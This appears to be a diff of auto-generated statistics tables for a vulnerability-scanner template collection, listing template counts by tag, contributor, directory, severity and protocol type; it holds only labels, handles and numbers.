||||
| hongdian | 4 | huowuzhao | 1 | | | | | | |
|
||||
| nacos | 3 | th3.d1p4k | 1 | | | | | | |
|
||||
| bitrix | 3 | bjhulst | 1 | | | | | | |
|
||||
| oa | 3 | 0h1in9e | 1 | | | | | | |
|
||||
| targa | 3 | d0rkerdevil | 1 | | | | | | |
|
||||
| openssh | 3 | philippdelteil | 1 | | | | | | |
|
||||
| tikiwiki | 3 | raesene | 1 | | | | | | |
|
||||
| r-seenet | 3 | ohlinge | 1 | | | | | | |
|
||||
| grafana | 3 | remonsec | 1 | | | | | | |
|
||||
| terramaster | 3 | makyotox | 1 | | | | | | |
|
||||
| windows | 3 | qlkwej | 1 | | | | | | |
|
||||
| lfr | 3 | gal nagli | 1 | | | | | | |
|
||||
| microstrategy | 3 | pdp | 1 | | | | | | |
|
||||
| amazon | 3 | ringo | 1 | | | | | | |
|
||||
| nosqli | 3 | johnk3r | 1 | | | | | | |
|
||||
| ofbiz | 3 | kurohost | 1 | | | | | | |
|
||||
| printer | 3 | jeya seelan | 1 | | | | | | |
|
||||
| log | 3 | shifacyclewla | 1 | | | | | | |
|
||||
| vbulletin | 3 | j33n1k4 | 1 | | | | | | |
|
||||
| mongodb | 3 | notsoevilweasel | 1 | | | | | | |
|
||||
| ebs | 3 | pudsec | 1 | | | | | | |
|
||||
| hp | 3 | whynotke | 1 | | | | | | |
|
||||
| cve2010 | 3 | ratnadip gajbhiye | 1 | | | | | | |
|
||||
| kubernetes | 3 | naglinagli | 1 | | | | | | |
|
||||
| git | 3 | akash.c | 1 | | | | | | |
|
||||
| slack | 3 | blckraven | 1 | | | | | | |
|
||||
| itop | 3 | alex | 1 | | | | | | |
|
||||
| resin | 3 | luskabol | 1 | | | | | | |
|
||||
| ssh | 3 | ahmed sherif | 1 | | | | | | |
|
||||
| backups | 3 | @github.com/defr0ggy | 1 | | | | | | |
|
||||
| zabbix | 3 | shreyapohekar | 1 | | | | | | |
|
||||
| bypass | 3 | aceseven (digisec360) | 1 | | | | | | |
|
||||
| kafka | 3 | sushant kamble | 1 | | | | | | |
|
||||
| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | |
|
||||
| zhiyuan | 3 | thezakman | 1 | | | | | | |
|
||||
| springcloud | 3 | streetofhackerr007 (rohit | 1 | | | | | | |
|
||||
| | | soni) | | | | | | | |
|
||||
| fanruan | 3 | regala_ | 1 | | | | | | |
|
||||
| fpd | 3 | j3ssie/geraldino2 | 1 | | | | | | |
|
||||
| caucho | 3 | thevillagehacker | 1 | | | | | | |
|
||||
| prometheus | 2 | juicypotato1 | 1 | | | | | | |
|
||||
| nextjs | 2 | jteles | 1 | | | | | | |
|
||||
| sonarqube | 2 | rojanrijal | 1 | | | | | | |
|
||||
| jsf | 2 | berkdusunur | 1 | | | | | | |
|
||||
| openfire | 2 | 52971 | 1 | | | | | | |
|
||||
| waf | 2 | gboddin | 1 | | | | | | |
|
||||
| kibana | 2 | ldionmarcil | 1 | | | | | | |
|
||||
| hpe | 2 | sshell | 1 | | | | | | |
|
||||
| akamai | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | |
|
||||
| xxljob | 2 | johnjhacking | 1 | | | | | | |
|
||||
| paloalto | 2 | idealphase | 1 | | | | | | |
|
||||
| grav | 2 | s1r1u5_ | 1 | | | | | | |
|
||||
| microsoft | 2 | cookiehanhoan | 1 | | | | | | |
|
||||
| shellshock | 2 | udyz | 1 | | | | | | |
|
||||
| sharepoint | 2 | rtcms | 1 | | | | | | |
|
||||
| mail | 2 | elmahdi | 1 | | | | | | |
|
||||
| seeyon | 2 | b4uh0lz | 1 | | | | | | |
|
||||
| dos | 2 | taielab | 1 | | | | | | |
|
||||
| idrac | 2 | yashanand155 | 1 | | | | | | |
|
||||
| vrealize | 2 | zhenwarx | 1 | | | | | | |
|
||||
| emerge | 2 | alph4byt3 | 1 | | | | | | |
|
||||
| globalprotect | 2 | _harleo | 1 | | | | | | |
|
||||
| linkerd | 2 | kishore krishna (sillydaddy) | 1 | | | | | | |
|
||||
| cve2008 | 2 | fopina | 1 | | | | | | |
|
||||
| rockmongo | 2 | schniggie | 1 | | | | | | |
|
||||
| voipmonitor | 2 | kareemse1im | 1 | | | | | | |
|
||||
| icewarp | 2 | retr0 | 1 | | | | | | |
|
||||
| keycloak | 2 | bad5ect0r | 1 | | | | | | |
|
||||
| cache | 2 | flag007 | 1 | | | | | | |
|
||||
| rstudio | 2 | noamrathaus | 1 | | | | | | |
|
||||
| odoo | 2 | geraldino2 | 1 | | | | | | |
|
||||
| yapi | 2 | andirrahmani1 | 1 | | | | | | |
|
||||
| natshell | 2 | manuelbua | 1 | | | | | | |
|
||||
| strapi | 2 | smaranchand | 1 | | | | | | |
|
||||
| trixbox | 2 | arcc | 1 | | | | | | |
|
||||
| jeedom | 2 | dawid czarnecki | 1 | | | | | | |
|
||||
| leak | 2 | soyelmago | 1 | | | | | | |
|
||||
| github | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | |
|
||||
| mida | 2 | mhdsamx | 1 | | | | | | |
|
||||
| akkadian | 2 | rodnt | 1 | | | | | | |
|
||||
| kevinlab | 2 | un-fmunozs | 1 | | | | | | |
|
||||
| splunk | 2 | micha3lb3n | 1 | | | | | | |
|
||||
| horde | 2 | aaron_costello | 1 | | | | | | |
|
||||
| | | (@conspiracyproof) | | | | | | | |
|
||||
| chamilo | 2 | sickwell | 1 | | | | | | |
|
||||
| kentico | 2 | apt-mirror | 1 | | | | | | |
|
||||
| frp | 2 | vzamanillo | 1 | | | | | | |
|
||||
| igs | 2 | @dwisiswant0 | 1 | | | | | | |
|
||||
| openam | 2 | sullo | 1 | | | | | | |
|
||||
| telerik | 2 | yavolo | 1 | | | | | | |
|
||||
| smtp | 2 | bernardo rodrigues | 1 | | | | | | |
|
||||
| | | @bernardofsr | andré monteiro | | | | | | | |
|
||||
| | | @am0nt31r0 | | | | | | | |
|
||||
| jellyfin | 2 | c3l3si4n | 1 | | | | | | |
|
||||
| flir | 2 | hakluke | 1 | | | | | | |
|
||||
| ucmdb | 2 | zandros0 | 1 | | | | | | |
|
||||
| cve2007 | 2 | bernardofsr | 1 | | | | | | |
|
||||
| injection | 2 | ajaysenr | 1 | | | | | | |
|
||||
| plesk | 2 | elder tao | 1 | | | | | | |
|
||||
| oauth | 2 | absshax | 1 | | | | | | |
|
||||
| nexus | 2 | wabafet | 1 | | | | | | |
|
||||
| phpcollab | 2 | affix | 1 | | | | | | |
|
||||
| wordfence | 2 | 0xtavian | 1 | | | | | | |
|
||||
| maian | 2 | furkansenan | 1 | | | | | | |
|
||||
| httpd | 2 | iampritam | 1 | | | | | | |
|
||||
| chiyu | 2 | revblock | 1 | | | | | | |
|
||||
| glassfish | 2 | dogasantos | 1 | | | | | | |
|
||||
| status | 2 | streetofhackerr007 | 1 | | | | | | |
|
||||
| webcam | 2 | divya_mudgal | 1 | | | | | | |
|
||||
| showdoc | 2 | 0xteles | 1 | | | | | | |
|
||||
| spark | 2 | fmunozs | 1 | | | | | | |
|
||||
| fortios | 2 | akshansh | 1 | | | | | | |
|
||||
| hasura | 2 | _c0wb0y_ | 1 | | | | | | |
|
||||
| hashicorp | 2 | ipanda | 1 | | | | | | |
|
||||
| sonicwall | 2 | b0yd | 1 | | | | | | |
|
||||
| pega | 2 | deena | 1 | | | | | | |
|
||||
| wp-theme | 2 | andysvints | 1 | | | | | | |
|
||||
| nagios | 2 | abison_binoy | 1 | | | | | | |
|
||||
| ecology | 2 | luci | 1 | | | | | | |
|
||||
| rockethchat | 2 | mohammedsaneem | 1 | | | | | | |
|
||||
| dolibarr | 2 | 0xrod | 1 | | | | | | |
|
||||
| service | 2 | omarkurt | 1 | | | | | | |
|
||||
| jboss | 2 | 0ut0fb4nd | 1 | | | | | | |
|
||||
| saltstack | 2 | chron0x | 1 | | | | | | |
|
||||
| smb | 2 | kba@sogeti_esec | 1 | | | | | | |
|
||||
| bigip | 2 | its0x08 | 1 | | | | | | |
|
||||
| activemq | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | |
|
||||
| proxy | 2 | ilovebinbash | 1 | | | | | | |
|
||||
| hjtcloud | 2 | sy3omda | 1 | | | | | | |
|
||||
| huawei | 2 | petruknisme | 1 | | | | | | |
|
||||
| wso2 | 2 | aresx | 1 | | | | | | |
|
||||
| intrusive | 2 | daviey | 1 | | | | | | |
|
||||
| couchdb | 2 | mubassirpatel | 1 | | | | | | |
|
||||
| erp-nc | 1 | alperenkesk | 1 | | | | | | |
|
||||
| yii | 1 | mah3sec_ | 1 | | | | | | |
|
||||
| lutron | 1 | undefl0w | 1 | | | | | | |
|
||||
| dvwa | 1 | patralos | 1 | | | | | | |
|
||||
| heroku | 1 | exploitation | 1 | | | | | | |
|
||||
| zarafa | 1 | defr0ggy | 1 | | | | | | |
|
||||
| expressjs | 1 | becivells | 1 | | | | | | |
|
||||
| openrestry | 1 | bolli95 | 1 | | | | | | |
|
||||
| seacms | 1 | hanlaomo | 1 | | | | | | |
|
||||
| mpsec | 1 | tirtha_mandal | 1 | | | | | | |
|
||||
| phalcon | 1 | sicksec | 1 | | | | | | |
|
||||
| clave | 1 | tim_koopmans | 1 | | | | | | |
|
||||
| scimono | 1 | willd96 | 1 | | | | | | |
|
||||
| wondercms | 1 | r3naissance | 1 | | | | | | |
|
||||
| swagger | 1 | shelld3v | 1 | | | | | | |
|
||||
| visualtools | 1 | sid ahmed malaoui @ realistic | 1 | | | | | | |
|
||||
| | | security | | | | | | | |
|
||||
| javascript | 1 | co0nan | 1 | | | | | | |
|
||||
| webmodule-ee | 1 | | | | | | | | |
|
||||
| spidercontrol | 1 | | | | | | | | |
|
||||
| varnish | 1 | | | | | | | | |
|
||||
| crm | 1 | | | | | | | | |
|
||||
| webmin | 1 | | | | | | | | |
|
||||
| nuuo | 1 | | | | | | | | |
|
||||
| auth | 1 | | | | | | | | |
|
||||
| doh | 1 | | | | | | | | |
|
||||
| panabit | 1 | | | | | | | | |
|
||||
| trilithic | 1 | | | | | | | | |
|
||||
| bedita | 1 | | | | | | | | |
|
||||
| webftp | 1 | | | | | | | | |
|
||||
| ueditor | 1 | | | | | | | | |
|
||||
| openerp | 1 | | | | | | | | |
|
||||
| gloo | 1 | | | | | | | | |
|
||||
| druid | 1 | | | | | | | | |
|
||||
| calendarix | 1 | | | | | | | | |
|
||||
| linkedin | 1 | | | | | | | | |
|
||||
| subrion | 1 | | | | | | | | |
|
||||
| powercreator | 1 | | | | | | | | |
|
||||
| blind | 1 | | | | | | | | |
|
||||
| rhymix | 1 | | | | | | | | |
|
||||
| tamronos | 1 | | | | | | | | |
|
||||
| ecom | 1 | | | | | | | | |
|
||||
| mantis | 1 | | | | | | | | |
|
||||
| ns | 1 | | | | | | | | |
|
||||
| aura | 1 | | | | | | | | |
|
||||
| rabbitmq | 1 | | | | | | | | |
|
||||
| zzzcms | 1 | | | | | | | | |
|
||||
| dotnetnuke | 1 | | | | | | | | |
|
||||
| fastcgi | 1 | | | | | | | | |
|
||||
| cocoon | 1 | | | | | | | | |
|
||||
| sitecore | 1 | | | | | | | | |
|
||||
| symfony | 1 | | | | | | | | |
|
||||
| webui | 1 | | | | | | | | |
|
||||
| vscode | 1 | | | | | | | | |
|
||||
| eprints | 1 | | | | | | | | |
|
||||
| sceditor | 1 | | | | | | | | |
|
||||
| yealink | 1 | | | | | | | | |
|
||||
| robomongo | 1 | | | | | | | | |
|
||||
| k8 | 1 | | | | | | | | |
|
||||
| mongoshake | 1 | | | | | | | | |
|
||||
| diris | 1 | | | | | | | | |
|
||||
| zcms | 1 | | | | | | | | |
|
||||
| fortilogger | 1 | | | | | | | | |
|
||||
| labtech | 1 | | | | | | | | |
|
||||
| fuelcms | 1 | | | | | | | | |
|
||||
| redcap | 1 | | | | | | | | |
|
||||
| krweb | 1 | | | | | | | | |
|
||||
| cloudflare | 1 | | | | | | | | |
|
||||
| exchange | 1 | | | | | | | | |
|
||||
| nuxeo | 1 | | | | | | | | |
|
||||
| wmt | 1 | | | | | | | | |
|
||||
| blackboard | 1 | | | | | | | | |
|
||||
| parentlink | 1 | | | | | | | | |
|
||||
| metinfo | 1 | | | | | | | | |
|
||||
| starttls | 1 | | | | | | | | |
|
||||
| zeroshell | 1 | | | | | | | | |
|
||||
| acme | 1 | | | | | | | | |
|
||||
| ssltls | 1 | | | | | | | | |
|
||||
| svn | 1 | | | | | | | | |
|
||||
| circontrorl | 1 | | | | | | | | |
|
||||
| ioncube | 1 | | | | | | | | |
|
||||
| ricoh | 1 | | | | | | | | |
|
||||
| mcafee | 1 | | | | | | | | |
|
||||
| kerbynet | 1 | | | | | | | | |
|
||||
| tensorboard | 1 | | | | | | | | |
|
||||
| expn | 1 | | | | | | | | |
|
||||
| blue-ocean | 1 | | | | | | | | |
|
||||
| eyou | 1 | | | | | | | | |
|
||||
| sureline | 1 | | | | | | | | |
|
||||
| gespage | 1 | | | | | | | | |
|
||||
| viewpoint | 1 | | | | | | | | |
|
||||
| linksys | 1 | | | | | | | | |
|
||||
| bitly | 1 | | | | | | | | |
|
||||
| gogs | 1 | | | | | | | | |
|
||||
| nps | 1 | | | | | | | | |
|
||||
| salesforce | 1 | | | | | | | | |
|
||||
| plastic | 1 | | | | | | | | |
|
||||
| lancom | 1 | | | | | | | | |
|
||||
| ec2 | 1 | | | | | | | | |
|
||||
| kafdrop | 1 | | | | | | | | |
|
||||
| mara | 1 | | | | | | | | |
|
||||
| xmlchart | 1 | | | | | | | | |
|
||||
| jenkin | 1 | | | | | | | | |
|
||||
| scs | 1 | | | | | | | | |
|
||||
| rmc | 1 | | | | | | | | |
|
||||
| episerver | 1 | | | | | | | | |
|
||||
| javamelody | 1 | | | | | | | | |
|
||||
| zend | 1 | | | | | | | | |
|
||||
| codeigniter | 1 | | | | | | | | |
|
||||
| mdb | 1 | | | | | | | | |
|
||||
| adminer | 1 | | | | | | | | |
|
||||
| smartsense | 1 | | | | | | | | |
|
||||
| mongo | 1 | | | | | | | | |
|
||||
| netdata | 1 | | | | | | | | |
|
||||
| lotuscms | 1 | | | | | | | | |
|
||||
| xvr | 1 | | | | | | | | |
|
||||
| sage | 1 | | | | | | | | |
|
||||
| geutebruck | 1 | | | | | | | | |
|
||||
| cerebro | 1 | | | | | | | | |
|
||||
| addpac | 1 | | | | | | | | |
|
||||
| froxlor | 1 | | | | | | | | |
|
||||
| wavemaker | 1 | | | | | | | | |
|
||||
| accela | 1 | | | | | | | | |
|
||||
| node-red-dashboard | 1 | | | | | | | | |
|
||||
| aruba | 1 | | | | | | | | |
|
||||
| camunda | 1 | | | | | | | | |
|
||||
| biometrics | 1 | | | | | | | | |
|
||||
| b2evolution | 1 | | | | | | | | |
|
||||
| fortigates | 1 | | | | | | | | |
|
||||
| javafaces | 1 | | | | | | | | |
|
||||
| geddy | 1 | | | | | | | | |
|
||||
| qcubed | 1 | | | | | | | | |
|
||||
| influxdb | 1 | | | | | | | | |
|
||||
| chevereto | 1 | | | | | | | | |
|
||||
| extractor | 1 | | | | | | | | |
|
||||
| jsp | 1 | | | | | | | | |
|
||||
| rdp | 1 | | | | | | | | |
|
||||
| idemia | 1 | | | | | | | | |
|
||||
| pagespeed | 1 | | | | | | | | |
|
||||
| lg-nas | 1 | | | | | | | | |
|
||||
| sco | 1 | | | | | | | | |
|
||||
| ulterius | 1 | | | | | | | | |
|
||||
| zenario | 1 | | | | | | | | |
|
||||
| beanshell | 1 | | | | | | | | |
|
||||
| appweb | 1 | | | | | | | | |
|
||||
| clink-office | 1 | | | | | | | | |
|
||||
| sidekiq | 1 | | | | | | | | |
|
||||
| alerta | 1 | | | | | | | | |
|
||||
| mysql | 1 | | | | | | | | |
|
||||
| sqlite | 1 | | | | | | | | |
|
||||
| bash | 1 | | | | | | | | |
|
||||
| kubeflow | 1 | | | | | | | | |
|
||||
| exacqvision | 1 | | | | | | | | |
|
||||
| selea | 1 | | | | | | | | |
|
||||
| wifisky | 1 | | | | | | | | |
|
||||
| jmx | 1 | | | | | | | | |
|
||||
| upload | 1 | | | | | | | | |
|
||||
| xunchi | 1 | | | | | | | | |
|
||||
| tpshop | 1 | | | | | | | | |
|
||||
| tongda | 1 | | | | | | | | |
|
||||
| darkstat | 1 | | | | | | | | |
|
||||
| openemr | 1 | | | | | | | | |
|
||||
| pgadmin | 1 | | | | | | | | |
|
||||
| postgres | 1 | | | | | | | | |
|
||||
| chinaunicom | 1 | | | | | | | | |
|
||||
| k8s | 1 | | | | | | | | |
|
||||
| szhe | 1 | | | | | | | | |
|
||||
| uwsgi | 1 | | | | | | | | |
|
||||
| ilo4 | 1 | | | | | | | | |
|
||||
| timesheet | 1 | | | | | | | | |
|
||||
| clusterengine | 1 | | | | | | | | |
|
||||
| redis | 1 | | | | | | | | |
|
||||
| interlib | 1 | | | | | | | | |
|
||||
| mautic | 1 | | | | | | | | |
|
||||
| discord | 1 | | | | | | | | |
|
||||
| htmli | 1 | | | | | | | | |
|
||||
| expose | 1 | | | | | | | | |
|
||||
| hadoop | 1 | | | | | | | | |
|
||||
| netis | 1 | | | | | | | | |
|
||||
| gridx | 1 | | | | | | | | |
|
||||
| vsphere | 1 | | | | | | | | |
|
||||
| default-login | 1 | | | | | | | | |
|
||||
| triconsole | 1 | | | | | | | | |
|
||||
| cse | 1 | | | | | | | | |
|
||||
| csod | 1 | | | | | | | | |
|
||||
| stem | 1 | | | | | | | | |
|
||||
| payara | 1 | | | | | | | | |
|
||||
| springframework | 1 | | | | | | | | |
|
||||
| avalanche | 1 | | | | | | | | |
|
||||
| wildfly | 1 | | | | | | | | |
|
||||
| soar | 1 | | | | | | | | |
|
||||
| aspnuke | 1 | | | | | | | | |
|
||||
| bolt | 1 | | | | | | | | |
|
||||
| nette | 1 | | | | | | | | |
|
||||
| fortigate | 1 | | | | | | | | |
|
||||
| ems | 1 | | | | | | | | |
|
||||
| shopxo | 1 | | | | | | | | |
|
||||
| sarg | 1 | | | | | | | | |
|
||||
| weiphp | 1 | | | | | | | | |
|
||||
| xiuno | 1 | | | | | | | | |
|
||||
| ruby | 1 | | | | | | | | |
|
||||
| acontent | 1 | | | | | | | | |
|
||||
| etouch | 1 | | | | | | | | |
|
||||
| tapestry | 1 | | | | | | | | |
|
||||
| flash | 1 | | | | | | | | |
|
||||
| memcached | 1 | | | | | | | | |
|
||||
| netsweeper | 1 | | | | | | | | |
|
||||
| gateone | 1 | | | | | | | | |
|
||||
| plugin | 1 | | | | | | | | |
|
||||
| dvr | 1 | | | | | | | | |
|
||||
| spring | 1 | | | | | | | | |
|
||||
| cacti | 1 | | | | | | | | |
|
||||
| email | 1 | | | | | | | | |
|
||||
| empirecms | 1 | | | | | | | | |
|
||||
| redhat | 1 | | | | | | | | |
|
||||
| plone | 1 | | | | | | | | |
|
||||
| openx | 1 | | | | | | | | |
|
||||
| achecker | 1 | | | | | | | | |
|
||||
| xml | 1 | | | | | | | | |
|
||||
| apos | 1 | | | | | | | | |
|
||||
| fortiweb | 1 | | | | | | | | |
|
||||
| huijietong | 1 | | | | | | | | |
|
||||
| pacsone | 1 | | | | | | | | |
|
||||
| resourcespace | 1 | | | | | | | | |
|
||||
| gotmls | 1 | | | | | | | | |
|
||||
| exposures | 1 | | | | | | | | |
|
||||
| landrayoa | 1 | | | | | | | | |
|
||||
| jquery | 1 | | | | | | | | |
|
||||
| codemeter | 1 | | | | | | | | |
|
||||
| wazuh | 1 | | | | | | | | |
|
||||
| guacamole | 1 | | | | | | | | |
|
||||
| anchorcms | 1 | | | | | | | | |
|
||||
| lighttpd | 1 | | | | | | | | |
|
||||
| glances | 1 | | | | | | | | |
|
||||
| azure | 1 | | | | | | | | |
|
||||
| keenetic | 1 | | | | | | | | |
|
||||
| spf | 1 | | | | | | | | |
|
||||
| glpi | 1 | | | | | | | | |
|
||||
| visionhub | 1 | | | | | | | | |
|
||||
| bigbluebutton | 1 | | | | | | | | |
|
||||
| xff | 1 | | | | | | | | |
|
||||
| iptime | 1 | | | | | | | | |
|
||||
| emby | 1 | | | | | | | | |
|
||||
| enumeration | 1 | | | | | | | | |
|
||||
| razor | 1 | | | | | | | | |
|
||||
| backdoor | 1 | | | | | | | | |
|
||||
| mantisbt | 1 | | | | | | | | |
|
||||
| gitlist | 1 | | | | | | | | |
|
||||
| kong | 1 | | | | | | | | |
|
||||
| mediumish | 1 | | | | | | | | |
|
||||
| ganglia | 1 | | | | | | | | |
|
||||
| jenzabar | 1 | | | | | | | | |
|
||||
| hortonworks | 1 | | | | | | | | |
|
||||
| lansweeper | 1 | | | | | | | | |
|
||||
| grails | 1 | | | | | | | | |
|
||||
| clockwatch | 1 | | | | | | | | |
|
||||
| flink | 1 | | | | | | | | |
|
||||
| api-manager | 1 | | | | | | | | |
|
||||
| rfi | 1 | | | | | | | | |
|
||||
| cgi | 1 | | | | | | | | |
|
||||
| jeewms | 1 | | | | | | | | |
|
||||
| finereport | 1 | | | | | | | | |
|
||||
| zm | 1 | | | | | | | | |
|
||||
| timeclock | 1 | | | | | | | | |
|
||||
| fastapi | 1 | | | | | | | | |
|
||||
| rubedo | 1 | | | | | | | | |
|
||||
| netrc | 1 | | | | | | | | |
|
||||
| tensorflow | 1 | | | | | | | | |
|
||||
| lanproxy | 1 | | | | | | | | |
|
||||
| panos | 1 | | | | | | | | |
|
||||
| axis | 1 | | | | | | | | |
|
||||
| mariadb | 1 | | | | | | | | |
|
||||
| haproxy | 1 | | | | | | | | |
|
||||
| openstack | 1 | | | | | | | | |
|
||||
| tileserver | 1 | | | | | | | | |
|
||||
| vsftpd | 1 | | | | | | | | |
|
||||
| npm | 1 | | | | | | | | |
|
||||
| rujjie | 1 | | | | | | | | |
|
||||
| redwood | 1 | | | | | | | | |
|
||||
| traefik | 1 | | | | | | | | |
|
||||
| wooyun | 1 | | | | | | | | |
|
||||
| checkpoint | 1 | | | | | | | | |
|
||||
| viewlinc | 1 | | | | | | | | |
|
||||
| phpinfo | 1 | | | | | | | | |
|
||||
| ssl | 1 | | | | | | | | |
|
||||
| sourcebans | 1 | | | | | | | | |
|
||||
| zimbra | 1 | | | | | | | | |
|
||||
| fiori | 1 | | | | | | | | |
|
||||
| saltapi | 1 | | | | | | | | |
|
||||
| tika | 1 | | | | | | | | |
|
||||
| socomec | 1 | | | | | | | | |
|
||||
| landray | 1 | | | | | | | | |
|
||||
| harbor | 1 | | | | | | | | |
|
||||
| ntopng | 1 | | | | | | | | |
|
||||
| nexusdb | 1 | | | | | | | | |
|
||||
| dom | 1 | | | | | | | | |
|
||||
| hiboss | 1 | | | | | | | | |
|
||||
| fedora | 1 | | | | | | | | |
|
||||
| jitsi | 1 | | | | | | | | |
|
||||
| nomad | 1 | | | | | | | | |
|
||||
| bruteforce | 1 | | | | | | | | |
|
||||
| qvisdvr | 1 | | | | | | | | |
|
||||
| majordomo2 | 1 | | | | | | | | |
|
||||
| ambari | 1 | | | | | | | | |
|
||||
| skywalking | 1 | | | | | | | | |
|
||||
| kyan | 1 | | | | | | | | |
|
||||
| opentsdb | 1 | | | | | | | | |
|
||||
| solman | 1 | | | | | | | | |
|
||||
| tenda | 1 | | | | | | | | |
|
||||
| maccmsv10 | 1 | | | | | | | | |
|
||||
| turbocrm | 1 | | | | | | | | |
|
||||
| zookeeper | 1 | | | | | | | | |
|
||||
| dnssec | 1 | | | | | | | | |
|
||||
| domxss | 1 | | | | | | | | |
|
||||
| phpunit | 1 | | | | | | | | |
|
||||
| livezilla | 1 | | | | | | | | |
|
||||
| discourse | 1 | | | | | | | | |
|
||||
| 74cms | 1 | | | | | | | | |
|
||||
| magicflow | 1 | | | | | | | | |
|
||||
| mailchimp | 1 | | | | | | | | |
|
||||
| dotnet | 1 | | | | | | | | |
|
||||
| vnc | 1 | | | | | | | | |
|
||||
| manageengine | 1 | | | | | | | | |
|
||||
| cors | 1 | | | | | | | | |
|
||||
| bullwark | 1 | | | | | | | | |
|
||||
| default | 1 | | | | | | | | |
|
||||
| getsimple | 1 | | | | | | | | |
|
||||
| nc2 | 1 | | | | | | | | |
|
||||
| db | 1 | | | | | | | | |
|
||||
| portainer | 1 | | | | | | | | |
|
||||
| enum | 1 | | | | | | | | |
|
||||
| wuzhicms | 1 | | | | | | | | |
|
||||
| jfrog | 1 | | | | | | | | |
|
||||
| sgp | 1 | | | | | | | | |
|
||||
| spip | 1 | | | | | | | | |
|
||||
| servicenow | 1 | | | | | | | | |
|
||||
| fortinet | 1 | | | | | | | | |
|
||||
| dompdf | 1 | | | | | | | | |
|
||||
| alertmanager | 1 | | | | | | | | |
|
||||
| commscope | 1 | | | | | | | | |
|
||||
| esmtp | 1 | | | | | | | | |
|
||||
| opm | 1 | | | | | | | | |
|
||||
| thinkadmin | 1 | | | | | | | | |
|
||||
| oscommerce | 1 | | | | | | | | |
|
||||
| ruckus | 1 | | | | | | | | |
|
||||
| sentry | 1 | | | | | | | | |
|
||||
| sangfor | 1 | | | | | | | | |
|
||||
| realteo | 1 | | | | | | | | |
|
||||
| h3c-imc | 1 | | | | | | | | |
|
||||
| setup | 1 | | | | | | | | |
|
||||
| svnserve | 1 | | | | | | | | |
|
||||
| spectracom | 1 | | | | | | | | |
|
||||
| node | 1 | | | | | | | | |
|
||||
| ghost | 1 | | | | | | | | |
|
||||
| primetek | 1 | | | | | | | | |
|
||||
| rmi | 1 | | | | | | | | |
|
||||
| woocomernce | 1 | | | | | | | | |
|
||||
| opencast | 1 | | | | | | | | |
|
||||
| wiki | 1 | | | | | | | | |
|
||||
| bookstack | 1 | | | | | | | | |
|
||||
| synnefo | 1 | | | | | | | | |
|
||||
| wamp | 1 | | | | | | | | |
|
||||
| embedthis | 1 | | | | | | | | |
|
||||
| duomicms | 1 | | | | | | | | |
|
||||
| optiLink | 1 | | | | | | | | |
|
||||
| cloudinary | 1 | | | | | | | | |
|
||||
| arl | 1 | | | | | | | | |
|
||||
| zmanda | 1 | | | | | | | | |
|
||||
| liferay | 1 | | | | | | | | |
|
||||
| xdcms | 1 | | | | | | | | |
|
||||
| nedi | 1 | | | | | | | | |
|
||||
| feifeicms | 1 | | | | | | | | |
|
||||
| alibaba | 1 | | | | | | | | |
|
||||
| cve2005 | 1 | | | | | | | | |
|
||||
| webadmin | 1 | | | | | | | | |
|
||||
| totaljs | 1 | | | | | | | | |
|
||||
| myucms | 1 | | | | | | | | |
|
||||
| drone | 1 | | | | | | | | |
|
||||
| centreon | 1 | | | | | | | | |
|
||||
| dotclear | 1 | | | | | | | | |
|
||||
| postmessage | 1 | | | | | | | | |
|
||||
| opensns | 1 | | | | | | | | |
|
||||
| nsasg | 1 | | | | | | | | |
|
||||
| octobercms | 1 | | | | | | | | |
|
||||
| upnp | 1 | | | | | | | | |
|
||||
| circontrol | 1 | | | | | | | | |
|
||||
| monitorix | 1 | | | | | | | | |
|
||||
| concrete | 1 | | | | | | | | |
|
||||
| monitorr | 1 | | | | | | | | |
|
||||
| csrf | 1 | | | | | | | | |
|
||||
| pulsesecure | 1 | | | | | | | | |
|
||||
| cobub | 1 | | | | | | | | |
|
||||
| zte | 1 | | | | | | | | |
|
||||
| phpfusion | 1 | | | | | | | | |
|
||||
| plc | 1 | | | | | | | | |
|
||||
| centos | 1 | | | | | | | | |
|
||||
| opensmtpd | 1 | | | | | | | | |
|
||||
| acexy | 1 | | | | | | | | |
|
||||
| nordex | 1 | | | | | | | | |
|
||||
| wavlink | 1 | | | | | | | | |
|
||||
| servicedesk | 1 | | | | | | | | |
|
||||
| wing-ftp | 1 | | | | | | | | |
|
||||
| mobileiron | 1 | | | | | | | | |
|
||||
| yachtcontrol | 1 | | | | | | | | |
|
||||
| rsyncd | 1 | | | | | | | | |
|
||||
| octoprint | 1 | | | | | | | | |
|
||||
| twitter-server | 1 | | | | | | | | |
|
||||
| zyxel | 1 | | | | | | | | |
|
||||
| sprintful | 1 | | | | | | | | |
|
||||
| mirai | 1 | | | | | | | | |
|
||||
| faraday | 1 | | | | | | | | |
|
||||
| favicon | 1 | | | | | | | | |
|
||||
| moin | 1 | | | | | | | | |
|
||||
| floc | 1 | | | | | | | | |
|
||||
| goahead | 1 | | | | | | | | |
|
||||
| st | 1 | | | | | | | | |
|
||||
| apiman | 1 | | | | | | | | |
|
||||
| comodo | 1 | | | | | | | | |
|
||||
| pippoint | 1 | | | | | | | | |
|
||||
| 2014 | 1 | | | | | | | | |
|
||||
| pyramid | 1 | | | | | | | | |
|
||||
| proftpd | 1 | | | | | | | | |
|
||||
| moinmoin | 1 | | | | | | | | |
|
||||
| jnoj | 1 | | | | | | | | |
|
||||
| firebase | 1 | | | | | | | | |
|
||||
| emc | 1 | | | | | | | | |
|
||||
| shopware | 1 | | | | | | | | |
|
||||
| klog | 1 | | | | | | | | |
|
||||
| avtech | 1 | | | | | | | | |
|
|
@ -0,0 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
|
||||
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
|
||||
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
|
||||
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
|
||||
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
|
||||
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
|
||||
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
|
||||
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
|
||||
